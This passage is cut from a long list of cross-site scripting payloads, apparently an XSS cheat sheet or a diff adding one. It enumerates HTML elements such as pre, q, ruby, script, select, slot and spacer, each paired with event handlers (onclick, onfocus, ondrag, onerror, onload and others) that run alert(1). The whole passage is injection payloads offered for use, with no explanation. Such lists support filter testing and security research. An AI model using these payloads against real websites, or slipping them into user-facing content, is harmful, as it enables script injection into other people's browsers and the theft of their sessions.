ondragend="alert(1)">test</pre> +<pre draggable="true" ondragenter="alert(1)">test</pre> +<pre draggable="true" ondragleave="alert(1)">test</pre> +<pre draggable="true" ondragstart="alert(1)">test</pre> +<pre id=x tabindex=1 onactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre> +<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus> +<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus> +<pre id=x tabindex=1 onfocus=alert(1)></pre> +<pre id=x tabindex=1 onfocusin=alert(1)></pre> +<pre onbeforecopy="alert(1)" contenteditable>test</pre> +<pre onbeforecut="alert(1)" contenteditable>test</pre> +<pre onbeforepaste="alert(1)" 
contenteditable>test</pre> +<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onclick="alert(1)">test</pre> +<pre oncontextmenu="alert(1)">test</pre> +<pre oncopy="alert(1)" contenteditable>test</pre> +<pre oncut="alert(1)" contenteditable>test</pre> +<pre ondblclick="alert(1)">test</pre> +<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus> +<pre onkeydown="alert(1)" contenteditable>test</pre> +<pre onkeypress="alert(1)" contenteditable>test</pre> +<pre onkeyup="alert(1)" contenteditable>test</pre> +<pre onmousedown="alert(1)">test</pre> +<pre onmouseenter="alert(1)">test</pre> +<pre onmouseleave="alert(1)">test</pre> +<pre onmousemove="alert(1)">test</pre> +<pre onmouseout="alert(1)">test</pre> +<pre onmouseover="alert(1)">test</pre> +<pre onmouseup="alert(1)">test</pre> +<pre onpaste="alert(1)" contenteditable>test</pre> +<progress draggable="true" ondrag="alert(1)">test</progress> +<progress draggable="true" ondragend="alert(1)">test</progress> +<progress draggable="true" ondragenter="alert(1)">test</progress> +<progress draggable="true" ondragleave="alert(1)">test</progress> +<progress draggable="true" ondragstart="alert(1)">test</progress> +<progress id=x tabindex=1 onactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress> +<progress id=x tabindex=1 onbeforedeactivate=alert(1)></progress><input autofocus> +<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus> +<progress id=x tabindex=1 onfocus=alert(1)></progress> +<progress id=x tabindex=1 onfocusin=alert(1)></progress> +<progress onbeforecopy="alert(1)" contenteditable>test</progress> +<progress onbeforecut="alert(1)" contenteditable>test</progress> +<progress onbeforepaste="alert(1)" contenteditable>test</progress> +<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onclick="alert(1)">test</progress> +<progress oncontextmenu="alert(1)">test</progress> +<progress oncopy="alert(1)" 
contenteditable>test</progress> +<progress oncut="alert(1)" contenteditable>test</progress> +<progress ondblclick="alert(1)">test</progress> +<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus> +<progress onkeydown="alert(1)" contenteditable>test</progress> +<progress onkeypress="alert(1)" contenteditable>test</progress> +<progress onkeyup="alert(1)" contenteditable>test</progress> +<progress onmousedown="alert(1)">test</progress> +<progress onmouseenter="alert(1)">test</progress> +<progress onmouseleave="alert(1)">test</progress> +<progress onmousemove="alert(1)">test</progress> +<progress onmouseout="alert(1)">test</progress> +<progress onmouseover="alert(1)">test</progress> +<progress onmouseup="alert(1)">test</progress> +<progress onpaste="alert(1)" contenteditable>test</progress> +<q draggable="true" ondrag="alert(1)">test</q> +<q draggable="true" ondragend="alert(1)">test</q> +<q draggable="true" ondragenter="alert(1)">test</q> +<q draggable="true" ondragleave="alert(1)">test</q> +<q draggable="true" ondragstart="alert(1)">test</q> +<q id=x tabindex=1 onactivate=alert(1)></q> +<q id=x tabindex=1 onbeforeactivate=alert(1)></q> +<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus> +<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus> +<q id=x tabindex=1 onfocus=alert(1)></q> +<q id=x tabindex=1 onfocusin=alert(1)></q> +<q onbeforecopy="alert(1)" contenteditable>test</q> +<q onbeforecut="alert(1)" contenteditable>test</q> +<q onbeforepaste="alert(1)" contenteditable>test</q> +<q onblur=alert(1) tabindex=1 id=x></q><input autofocus> +<q onclick="alert(1)">test</q> +<q oncontextmenu="alert(1)">test</q> +<q oncopy="alert(1)" contenteditable>test</q> +<q oncut="alert(1)" contenteditable>test</q> +<q ondblclick="alert(1)">test</q> +<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus> +<q onkeydown="alert(1)" contenteditable>test</q> +<q onkeypress="alert(1)" contenteditable>test</q> +<q onkeyup="alert(1)" 
contenteditable>test</q> +<q onmousedown="alert(1)">test</q> +<q onmouseenter="alert(1)">test</q> +<q onmouseleave="alert(1)">test</q> +<q onmousemove="alert(1)">test</q> +<q onmouseout="alert(1)">test</q> +<q onmouseover="alert(1)">test</q> +<q onmouseup="alert(1)">test</q> +<q onpaste="alert(1)" contenteditable>test</q> +<rb draggable="true" ondrag="alert(1)">test</rb> +<rb draggable="true" ondragend="alert(1)">test</rb> +<rb draggable="true" ondragenter="alert(1)">test</rb> +<rb draggable="true" ondragleave="alert(1)">test</rb> +<rb draggable="true" ondragstart="alert(1)">test</rb> +<rb id=x tabindex=1 onactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb> +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus> +<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus> +<rb id=x tabindex=1 onfocus=alert(1)></rb> +<rb id=x tabindex=1 onfocusin=alert(1)></rb> +<rb onbeforecopy="alert(1)" contenteditable>test</rb> +<rb onbeforecut="alert(1)" contenteditable>test</rb> +<rb onbeforepaste="alert(1)" contenteditable>test</rb> +<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onclick="alert(1)">test</rb> +<rb oncontextmenu="alert(1)">test</rb> +<rb oncopy="alert(1)" contenteditable>test</rb> +<rb oncut="alert(1)" contenteditable>test</rb> +<rb ondblclick="alert(1)">test</rb> +<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus> +<rb onkeydown="alert(1)" contenteditable>test</rb> +<rb onkeypress="alert(1)" contenteditable>test</rb> +<rb onkeyup="alert(1)" contenteditable>test</rb> +<rb onmousedown="alert(1)">test</rb> +<rb onmouseenter="alert(1)">test</rb> +<rb onmouseleave="alert(1)">test</rb> +<rb onmousemove="alert(1)">test</rb> +<rb onmouseout="alert(1)">test</rb> +<rb onmouseover="alert(1)">test</rb> +<rb onmouseup="alert(1)">test</rb> +<rb onpaste="alert(1)" contenteditable>test</rb> +<rp draggable="true" ondrag="alert(1)">test</rp> +<rp draggable="true" ondragend="alert(1)">test</rp> +<rp 
draggable="true" ondragenter="alert(1)">test</rp> +<rp draggable="true" ondragleave="alert(1)">test</rp> +<rp draggable="true" ondragstart="alert(1)">test</rp> +<rp id=x tabindex=1 onactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp> +<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus> +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus> +<rp id=x tabindex=1 onfocus=alert(1)></rp> +<rp id=x tabindex=1 onfocusin=alert(1)></rp> +<rp onbeforecopy="alert(1)" contenteditable>test</rp> +<rp onbeforecut="alert(1)" contenteditable>test</rp> +<rp onbeforepaste="alert(1)" contenteditable>test</rp> +<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onclick="alert(1)">test</rp> +<rp oncontextmenu="alert(1)">test</rp> +<rp oncopy="alert(1)" contenteditable>test</rp> +<rp oncut="alert(1)" contenteditable>test</rp> +<rp ondblclick="alert(1)">test</rp> +<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus> +<rp onkeydown="alert(1)" contenteditable>test</rp> +<rp onkeypress="alert(1)" contenteditable>test</rp> +<rp onkeyup="alert(1)" contenteditable>test</rp> +<rp onmousedown="alert(1)">test</rp> +<rp onmouseenter="alert(1)">test</rp> +<rp onmouseleave="alert(1)">test</rp> +<rp onmousemove="alert(1)">test</rp> +<rp onmouseout="alert(1)">test</rp> +<rp onmouseover="alert(1)">test</rp> +<rp onmouseup="alert(1)">test</rp> +<rp onpaste="alert(1)" contenteditable>test</rp> +<rt draggable="true" ondrag="alert(1)">test</rt> +<rt draggable="true" ondragend="alert(1)">test</rt> +<rt draggable="true" ondragenter="alert(1)">test</rt> +<rt draggable="true" ondragleave="alert(1)">test</rt> +<rt draggable="true" ondragstart="alert(1)">test</rt> +<rt id=x tabindex=1 onactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt> +<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus> +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus> +<rt id=x tabindex=1 
onfocus=alert(1)></rt> +<rt id=x tabindex=1 onfocusin=alert(1)></rt> +<rt onbeforecopy="alert(1)" contenteditable>test</rt> +<rt onbeforecut="alert(1)" contenteditable>test</rt> +<rt onbeforepaste="alert(1)" contenteditable>test</rt> +<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onclick="alert(1)">test</rt> +<rt oncontextmenu="alert(1)">test</rt> +<rt oncopy="alert(1)" contenteditable>test</rt> +<rt oncut="alert(1)" contenteditable>test</rt> +<rt ondblclick="alert(1)">test</rt> +<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus> +<rt onkeydown="alert(1)" contenteditable>test</rt> +<rt onkeypress="alert(1)" contenteditable>test</rt> +<rt onkeyup="alert(1)" contenteditable>test</rt> +<rt onmousedown="alert(1)">test</rt> +<rt onmouseenter="alert(1)">test</rt> +<rt onmouseleave="alert(1)">test</rt> +<rt onmousemove="alert(1)">test</rt> +<rt onmouseout="alert(1)">test</rt> +<rt onmouseover="alert(1)">test</rt> +<rt onmouseup="alert(1)">test</rt> +<rt onpaste="alert(1)" contenteditable>test</rt> +<rtc draggable="true" ondrag="alert(1)">test</rtc> +<rtc draggable="true" ondragend="alert(1)">test</rtc> +<rtc draggable="true" ondragenter="alert(1)">test</rtc> +<rtc draggable="true" ondragleave="alert(1)">test</rtc> +<rtc draggable="true" ondragstart="alert(1)">test</rtc> +<rtc id=x tabindex=1 onactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc> +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus> +<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus> +<rtc id=x tabindex=1 onfocus=alert(1)></rtc> +<rtc id=x tabindex=1 onfocusin=alert(1)></rtc> +<rtc onbeforecopy="alert(1)" contenteditable>test</rtc> +<rtc onbeforecut="alert(1)" contenteditable>test</rtc> +<rtc onbeforepaste="alert(1)" contenteditable>test</rtc> +<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onclick="alert(1)">test</rtc> +<rtc oncontextmenu="alert(1)">test</rtc> +<rtc oncopy="alert(1)" 
contenteditable>test</rtc> +<rtc oncut="alert(1)" contenteditable>test</rtc> +<rtc ondblclick="alert(1)">test</rtc> +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus> +<rtc onkeydown="alert(1)" contenteditable>test</rtc> +<rtc onkeypress="alert(1)" contenteditable>test</rtc> +<rtc onkeyup="alert(1)" contenteditable>test</rtc> +<rtc onmousedown="alert(1)">test</rtc> +<rtc onmouseenter="alert(1)">test</rtc> +<rtc onmouseleave="alert(1)">test</rtc> +<rtc onmousemove="alert(1)">test</rtc> +<rtc onmouseout="alert(1)">test</rtc> +<rtc onmouseover="alert(1)">test</rtc> +<rtc onmouseup="alert(1)">test</rtc> +<rtc onpaste="alert(1)" contenteditable>test</rtc> +<ruby draggable="true" ondrag="alert(1)">test</ruby> +<ruby draggable="true" ondragend="alert(1)">test</ruby> +<ruby draggable="true" ondragenter="alert(1)">test</ruby> +<ruby draggable="true" ondragleave="alert(1)">test</ruby> +<ruby draggable="true" ondragstart="alert(1)">test</ruby> +<ruby id=x tabindex=1 onactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby> +<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus> +<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus> +<ruby id=x tabindex=1 onfocus=alert(1)></ruby> +<ruby id=x tabindex=1 onfocusin=alert(1)></ruby> +<ruby onbeforecopy="alert(1)" contenteditable>test</ruby> +<ruby onbeforecut="alert(1)" contenteditable>test</ruby> +<ruby onbeforepaste="alert(1)" contenteditable>test</ruby> +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onclick="alert(1)">test</ruby> +<ruby oncontextmenu="alert(1)">test</ruby> +<ruby oncopy="alert(1)" contenteditable>test</ruby> +<ruby oncut="alert(1)" contenteditable>test</ruby> +<ruby ondblclick="alert(1)">test</ruby> +<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus> +<ruby onkeydown="alert(1)" contenteditable>test</ruby> +<ruby onkeypress="alert(1)" contenteditable>test</ruby> +<ruby onkeyup="alert(1)" 
contenteditable>test</ruby> +<ruby onmousedown="alert(1)">test</ruby> +<ruby onmouseenter="alert(1)">test</ruby> +<ruby onmouseleave="alert(1)">test</ruby> +<ruby onmousemove="alert(1)">test</ruby> +<ruby onmouseout="alert(1)">test</ruby> +<ruby onmouseover="alert(1)">test</ruby> +<ruby onmouseup="alert(1)">test</ruby> +<ruby onpaste="alert(1)" contenteditable>test</ruby> +<s draggable="true" ondrag="alert(1)">test</s> +<s draggable="true" ondragend="alert(1)">test</s> +<s draggable="true" ondragenter="alert(1)">test</s> +<s draggable="true" ondragleave="alert(1)">test</s> +<s draggable="true" ondragstart="alert(1)">test</s> +<s id=x tabindex=1 onactivate=alert(1)></s> +<s id=x tabindex=1 onbeforeactivate=alert(1)></s> +<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus> +<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus> +<s id=x tabindex=1 onfocus=alert(1)></s> +<s id=x tabindex=1 onfocusin=alert(1)></s> +<s onbeforecopy="alert(1)" contenteditable>test</s> +<s onbeforecut="alert(1)" contenteditable>test</s> +<s onbeforepaste="alert(1)" contenteditable>test</s> +<s onblur=alert(1) tabindex=1 id=x></s><input autofocus> +<s onclick="alert(1)">test</s> +<s oncontextmenu="alert(1)">test</s> +<s oncopy="alert(1)" contenteditable>test</s> +<s oncut="alert(1)" contenteditable>test</s> +<s ondblclick="alert(1)">test</s> +<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus> +<s onkeydown="alert(1)" contenteditable>test</s> +<s onkeypress="alert(1)" contenteditable>test</s> +<s onkeyup="alert(1)" contenteditable>test</s> +<s onmousedown="alert(1)">test</s> +<s onmouseenter="alert(1)">test</s> +<s onmouseleave="alert(1)">test</s> +<s onmousemove="alert(1)">test</s> +<s onmouseout="alert(1)">test</s> +<s onmouseover="alert(1)">test</s> +<s onmouseup="alert(1)">test</s> +<s onpaste="alert(1)" contenteditable>test</s> +<samp draggable="true" ondrag="alert(1)">test</samp> +<samp draggable="true" ondragend="alert(1)">test</samp> +<samp 
draggable="true" ondragenter="alert(1)">test</samp> +<samp draggable="true" ondragleave="alert(1)">test</samp> +<samp draggable="true" ondragstart="alert(1)">test</samp> +<samp id=x tabindex=1 onactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp> +<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus> +<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus> +<samp id=x tabindex=1 onfocus=alert(1)></samp> +<samp id=x tabindex=1 onfocusin=alert(1)></samp> +<samp onbeforecopy="alert(1)" contenteditable>test</samp> +<samp onbeforecut="alert(1)" contenteditable>test</samp> +<samp onbeforepaste="alert(1)" contenteditable>test</samp> +<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onclick="alert(1)">test</samp> +<samp oncontextmenu="alert(1)">test</samp> +<samp oncopy="alert(1)" contenteditable>test</samp> +<samp oncut="alert(1)" contenteditable>test</samp> +<samp ondblclick="alert(1)">test</samp> +<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus> +<samp onkeydown="alert(1)" contenteditable>test</samp> +<samp onkeypress="alert(1)" contenteditable>test</samp> +<samp onkeyup="alert(1)" contenteditable>test</samp> +<samp onmousedown="alert(1)">test</samp> +<samp onmouseenter="alert(1)">test</samp> +<samp onmouseleave="alert(1)">test</samp> +<samp onmousemove="alert(1)">test</samp> +<samp onmouseout="alert(1)">test</samp> +<samp onmouseover="alert(1)">test</samp> +<samp onmouseup="alert(1)">test</samp> +<samp onpaste="alert(1)" contenteditable>test</samp> +<script draggable="true" ondrag="alert(1)">test</script> +<script draggable="true" ondragend="alert(1)">test</script> +<script draggable="true" ondragenter="alert(1)">test</script> +<script draggable="true" ondragleave="alert(1)">test</script> +<script draggable="true" ondragstart="alert(1)">test</script> +<script id=x tabindex=1 onactivate=alert(1)></script> +<script id=x tabindex=1 
onbeforeactivate=alert(1)></script> +<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus> +<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus> +<script id=x tabindex=1 onfocus=alert(1)></script> +<script id=x tabindex=1 onfocusin=alert(1)></script> +<script onbeforecopy="alert(1)" contenteditable>test</script> +<script onbeforecut="alert(1)" contenteditable>test</script> +<script onbeforepaste="alert(1)" contenteditable>test</script> +<script onblur=alert(1) tabindex=1 id=x></script><input autofocus> +<script onclick="alert(1)">test</script> +<script oncontextmenu="alert(1)">test</script> +<script oncopy="alert(1)" contenteditable>test</script> +<script oncut="alert(1)" contenteditable>test</script> +<script ondblclick="alert(1)">test</script> +<script onerror=alert(1) src=/></script> +<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus> +<script onkeydown="alert(1)" contenteditable>test</script> +<script onkeypress="alert(1)" contenteditable>test</script> +<script onkeyup="alert(1)" contenteditable>test</script> +<script onload=alert(1) src=validjs.js></script> +<script onmousedown="alert(1)">test</script> +<script onmouseenter="alert(1)">test</script> +<script onmouseleave="alert(1)">test</script> +<script onmousemove="alert(1)">test</script> +<script onmouseout="alert(1)">test</script> +<script onmouseover="alert(1)">test</script> +<script onmouseup="alert(1)">test</script> +<script onpaste="alert(1)" contenteditable>test</script> +<script onreadystatechange=alert(1)></script> +<section draggable="true" ondrag="alert(1)">test</section> +<section draggable="true" ondragend="alert(1)">test</section> +<section draggable="true" ondragenter="alert(1)">test</section> +<section draggable="true" ondragleave="alert(1)">test</section> +<section draggable="true" ondragstart="alert(1)">test</section> +<section id=x tabindex=1 onactivate=alert(1)></section> +<section id=x tabindex=1 
onbeforeactivate=alert(1)></section> +<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus> +<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus> +<section id=x tabindex=1 onfocus=alert(1)></section> +<section id=x tabindex=1 onfocusin=alert(1)></section> +<section onbeforecopy="alert(1)" contenteditable>test</section> +<section onbeforecut="alert(1)" contenteditable>test</section> +<section onbeforepaste="alert(1)" contenteditable>test</section> +<section onblur=alert(1) tabindex=1 id=x></section><input autofocus> +<section onclick="alert(1)">test</section> +<section oncontextmenu="alert(1)">test</section> +<section oncopy="alert(1)" contenteditable>test</section> +<section oncut="alert(1)" contenteditable>test</section> +<section ondblclick="alert(1)">test</section> +<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus> +<section onkeydown="alert(1)" contenteditable>test</section> +<section onkeypress="alert(1)" contenteditable>test</section> +<section onkeyup="alert(1)" contenteditable>test</section> +<section onmousedown="alert(1)">test</section> +<section onmouseenter="alert(1)">test</section> +<section onmouseleave="alert(1)">test</section> +<section onmousemove="alert(1)">test</section> +<section onmouseout="alert(1)">test</section> +<section onmouseover="alert(1)">test</section> +<section onmouseup="alert(1)">test</section> +<section onpaste="alert(1)" contenteditable>test</section> +<select autofocus onfocus=alert(1)> +<select autofocus onfocusin=alert(1)> +<select draggable="true" ondrag="alert(1)">test</select> +<select draggable="true" ondragend="alert(1)">test</select> +<select draggable="true" ondragenter="alert(1)">test</select> +<select draggable="true" ondragleave="alert(1)">test</select> +<select draggable="true" ondragstart="alert(1)">test</select> +<select id=x tabindex=1 onactivate=alert(1)></select> +<select id=x tabindex=1 onbeforeactivate=alert(1)></select> +<select 
id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus> +<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus> +<select onbeforecopy="alert(1)" contenteditable>test</select> +<select onbeforecut="alert(1)" contenteditable>test</select> +<select onbeforepaste="alert(1)" contenteditable>test</select> +<select onblur=alert(1) id=x></select><input autofocus> +<select onchange=alert(1)><option>change me</option><option>XSS</option></select> +<select onclick="alert(1)">test</select> +<select oncontextmenu="alert(1)">test</select> +<select oncopy="alert(1)" contenteditable>test</select> +<select oncut="alert(1)" contenteditable>test</select> +<select ondblclick="alert(1)">test</select> +<select onfocusout=alert(1) id=x></select><input autofocus> +<select onkeydown="alert(1)" contenteditable>test</select> +<select onkeypress="alert(1)" contenteditable>test</select> +<select onkeyup="alert(1)" contenteditable>test</select> +<select onmousedown="alert(1)">test</select> +<select onmouseenter="alert(1)">test</select> +<select onmouseleave="alert(1)">test</select> +<select onmousemove="alert(1)">test</select> +<select onmouseout="alert(1)">test</select> +<select onmouseover="alert(1)">test</select> +<select onmouseup="alert(1)">test</select> +<select onpaste="alert(1)" contenteditable>test</select> +<shadow draggable="true" ondrag="alert(1)">test</shadow> +<shadow draggable="true" ondragend="alert(1)">test</shadow> +<shadow draggable="true" ondragenter="alert(1)">test</shadow> +<shadow draggable="true" ondragleave="alert(1)">test</shadow> +<shadow draggable="true" ondragstart="alert(1)">test</shadow> +<shadow id=x tabindex=1 onactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow> +<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus> +<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus> +<shadow id=x tabindex=1 onfocus=alert(1)></shadow> +<shadow id=x 
tabindex=1 onfocusin=alert(1)></shadow> +<shadow onbeforecopy="alert(1)" contenteditable>test</shadow> +<shadow onbeforecut="alert(1)" contenteditable>test</shadow> +<shadow onbeforepaste="alert(1)" contenteditable>test</shadow> +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onclick="alert(1)">test</shadow> +<shadow oncontextmenu="alert(1)">test</shadow> +<shadow oncopy="alert(1)" contenteditable>test</shadow> +<shadow oncut="alert(1)" contenteditable>test</shadow> +<shadow ondblclick="alert(1)">test</shadow> +<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus> +<shadow onkeydown="alert(1)" contenteditable>test</shadow> +<shadow onkeypress="alert(1)" contenteditable>test</shadow> +<shadow onkeyup="alert(1)" contenteditable>test</shadow> +<shadow onmousedown="alert(1)">test</shadow> +<shadow onmouseenter="alert(1)">test</shadow> +<shadow onmouseleave="alert(1)">test</shadow> +<shadow onmousemove="alert(1)">test</shadow> +<shadow onmouseout="alert(1)">test</shadow> +<shadow onmouseover="alert(1)">test</shadow> +<shadow onmouseup="alert(1)">test</shadow> +<shadow onpaste="alert(1)" contenteditable>test</shadow> +<slot draggable="true" ondrag="alert(1)">test</slot> +<slot draggable="true" ondragend="alert(1)">test</slot> +<slot draggable="true" ondragenter="alert(1)">test</slot> +<slot draggable="true" ondragleave="alert(1)">test</slot> +<slot draggable="true" ondragstart="alert(1)">test</slot> +<slot id=x tabindex=1 onactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot> +<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus> +<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus> +<slot id=x tabindex=1 onfocus=alert(1)></slot> +<slot id=x tabindex=1 onfocusin=alert(1)></slot> +<slot onbeforecopy="alert(1)" contenteditable>test</slot> +<slot onbeforecut="alert(1)" contenteditable>test</slot> +<slot onbeforepaste="alert(1)" contenteditable>test</slot> 
+<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onclick="alert(1)">test</slot> +<slot oncontextmenu="alert(1)">test</slot> +<slot oncopy="alert(1)" contenteditable>test</slot> +<slot oncut="alert(1)" contenteditable>test</slot> +<slot ondblclick="alert(1)">test</slot> +<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus> +<slot onkeydown="alert(1)" contenteditable>test</slot> +<slot onkeypress="alert(1)" contenteditable>test</slot> +<slot onkeyup="alert(1)" contenteditable>test</slot> +<slot onmousedown="alert(1)">test</slot> +<slot onmouseenter="alert(1)">test</slot> +<slot onmouseleave="alert(1)">test</slot> +<slot onmousemove="alert(1)">test</slot> +<slot onmouseout="alert(1)">test</slot> +<slot onmouseover="alert(1)">test</slot> +<slot onmouseup="alert(1)">test</slot> +<slot onpaste="alert(1)" contenteditable>test</slot> +<small draggable="true" ondrag="alert(1)">test</small> +<small draggable="true" ondragend="alert(1)">test</small> +<small draggable="true" ondragenter="alert(1)">test</small> +<small draggable="true" ondragleave="alert(1)">test</small> +<small draggable="true" ondragstart="alert(1)">test</small> +<small id=x tabindex=1 onactivate=alert(1)></small> +<small id=x tabindex=1 onbeforeactivate=alert(1)></small> +<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus> +<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus> +<small id=x tabindex=1 onfocus=alert(1)></small> +<small id=x tabindex=1 onfocusin=alert(1)></small> +<small onbeforecopy="alert(1)" contenteditable>test</small> +<small onbeforecut="alert(1)" contenteditable>test</small> +<small onbeforepaste="alert(1)" contenteditable>test</small> +<small onblur=alert(1) tabindex=1 id=x></small><input autofocus> +<small onclick="alert(1)">test</small> +<small oncontextmenu="alert(1)">test</small> +<small oncopy="alert(1)" contenteditable>test</small> +<small oncut="alert(1)" contenteditable>test</small> +<small 
ondblclick="alert(1)">test</small> +<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus> +<small onkeydown="alert(1)" contenteditable>test</small> +<small onkeypress="alert(1)" contenteditable>test</small> +<small onkeyup="alert(1)" contenteditable>test</small> +<small onmousedown="alert(1)">test</small> +<small onmouseenter="alert(1)">test</small> +<small onmouseleave="alert(1)">test</small> +<small onmousemove="alert(1)">test</small> +<small onmouseout="alert(1)">test</small> +<small onmouseover="alert(1)">test</small> +<small onmouseup="alert(1)">test</small> +<small onpaste="alert(1)" contenteditable>test</small> +<source draggable="true" ondrag="alert(1)">test</source> +<source draggable="true" ondragend="alert(1)">test</source> +<source draggable="true" ondragenter="alert(1)">test</source> +<source draggable="true" ondragleave="alert(1)">test</source> +<source draggable="true" ondragstart="alert(1)">test</source> +<source id=x tabindex=1 onactivate=alert(1)></source> +<source id=x tabindex=1 onbeforeactivate=alert(1)></source> +<source id=x tabindex=1 onbeforedeactivate=alert(1)></source><input autofocus> +<source id=x tabindex=1 ondeactivate=alert(1)></source><input id=y autofocus> +<source id=x tabindex=1 onfocus=alert(1)></source> +<source id=x tabindex=1 onfocusin=alert(1)></source> +<source onbeforecopy="alert(1)" contenteditable>test</source> +<source onbeforecut="alert(1)" contenteditable>test</source> +<source onbeforepaste="alert(1)" contenteditable>test</source> +<source onblur=alert(1) tabindex=1 id=x></source><input autofocus> +<source onclick="alert(1)">test</source> +<source oncontextmenu="alert(1)">test</source> +<source oncopy="alert(1)" contenteditable>test</source> +<source oncut="alert(1)" contenteditable>test</source> +<source ondblclick="alert(1)">test</source> +<source onfocusout=alert(1) tabindex=1 id=x></source><input autofocus> +<source onkeydown="alert(1)" contenteditable>test</source> +<source onkeypress="alert(1)" 
contenteditable>test</source> +<source onkeyup="alert(1)" contenteditable>test</source> +<source onmousedown="alert(1)">test</source> +<source onmouseenter="alert(1)">test</source> +<source onmouseleave="alert(1)">test</source> +<source onmousemove="alert(1)">test</source> +<source onmouseout="alert(1)">test</source> +<source onmouseover="alert(1)">test</source> +<source onmouseup="alert(1)">test</source> +<source onpaste="alert(1)" contenteditable>test</source> +<spacer draggable="true" ondrag="alert(1)">test</spacer> +<spacer draggable="true" ondragend="alert(1)">test</spacer> +<spacer draggable="true" ondragenter="alert(1)">test</spacer> +<spacer draggable="true" ondragleave="alert(1)">test</spacer> +<spacer draggable="true" ondragstart="alert(1)">test</spacer> +<spacer id=x tabindex=1 onactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforeactivate=alert(1)></spacer> +<spacer id=x tabindex=1 onbeforedeactivate=alert(1)></spacer><input autofocus> +<spacer id=x tabindex=1 ondeactivate=alert(1)></spacer><input id=y autofocus> +<spacer id=x tabindex=1 onfocus=alert(1)></spacer> +<spacer id=x tabindex=1 onfocusin=alert(1)></spacer> +<spacer onbeforecopy="alert(1)" contenteditable>test</spacer> +<spacer onbeforecut="alert(1)" contenteditable>test</spacer> +<spacer onbeforepaste="alert(1)" contenteditable>test</spacer> +<spacer onblur=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onclick="alert(1)">test</spacer> +<spacer oncontextmenu="alert(1)">test</spacer> +<spacer oncopy="alert(1)" contenteditable>test</spacer> +<spacer oncut="alert(1)" contenteditable>test</spacer> +<spacer ondblclick="alert(1)">test</spacer> +<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus> +<spacer onkeydown="alert(1)" contenteditable>test</spacer> +<spacer onkeypress="alert(1)" contenteditable>test</spacer> +<spacer onkeyup="alert(1)" 